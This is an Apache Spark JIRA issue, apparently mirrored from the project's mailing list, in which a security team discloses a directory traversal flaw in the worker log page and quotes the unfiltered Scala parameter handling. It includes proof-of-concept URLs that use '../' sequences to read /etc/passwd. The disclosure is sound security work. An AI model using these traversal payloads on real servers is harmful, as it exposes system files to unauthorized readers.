You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@spark.apache.org by "0keeTeam (JIRA)" <ji...@apache.org> on 2015/06/03 10:32:49 UTC
[jira] [Created] (SPARK-8073) Directory traversal vulnerability
0keeTeam created SPARK-8073:
-------------------------------
Summary: Directory traversal vulnerability
Key: SPARK-8073
URL: https://issues.apache.org/jira/browse/SPARK-8073
Project: Spark
Issue Type: Bug
Components: Deploy, Spark Core, Web UI
Affects Versions: 1.3.1
Environment: Centos6.4
Reporter: 0keeTeam
Priority: Critical
We are a information security team from QIHU 360 company, China.
We found a 0day vulnerability in spark and writing to apply for a CVE ID,Please refer to below report. Thanks!
[Team info]
name: 0keeTeam
company: QIHU 360 company, China
email: g-sec-web@360.cn
Details of the vulnerability are as follows:
{color:red}
Poc&Exp:
http://xxx.com/logPage/?appId=../../../../../../../../../../../../../../../&executorId=&logType=etc/passwd
or:
http://xxx.com/logPage/?driverId=../../../../../../../../../../../../../../../&logType=etc/passwd
{color}
*spark-1.3.1\core\src\main\scala\org\apache\spark\deploy\worker\ui\LogPage.scala : Line36:*
{quote}{color:red}// parameters get from GET are not filtered{color}
val appId = Option(request.getParameter("appId"))
val executorId = Option(request.getParameter("executorId"))
val driverId = Option(request.getParameter("driverId"))
val logType = request.getParameter("logType")
val offset = Option(request.getParameter("offset")).map(_.toLong)
val byteLength = Option(request.getParameter("byteLength")).map(_.toInt).getOrElse(defaultBytes)
........
val (logText, startByte, endByte, logLength) = getLog(logDir, logType, offset, byteLength)
{quote}
*and Line125:*
{quote}
private def getLog(
........
val files = RollingFileAppender.getSortedRolledOverFiles(logDirectory, logType)
........
val logText = Utils.offsetBytes(files, startIndex, endIndex)
{quote}
*spark-1.3.1\core\src\main\scala\org\apache\spark\util\logging\RollingFileAppender.scala :Line152:*
{quote}
def getSortedRolledOverFiles(directory: String, activeFileName: String):
........
val file = new File(directory, activeFileName).getAbsoluteFile
........
{quote}
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscribe@spark.apache.org
For additional commands, e-mail: issues-help@spark.apache.org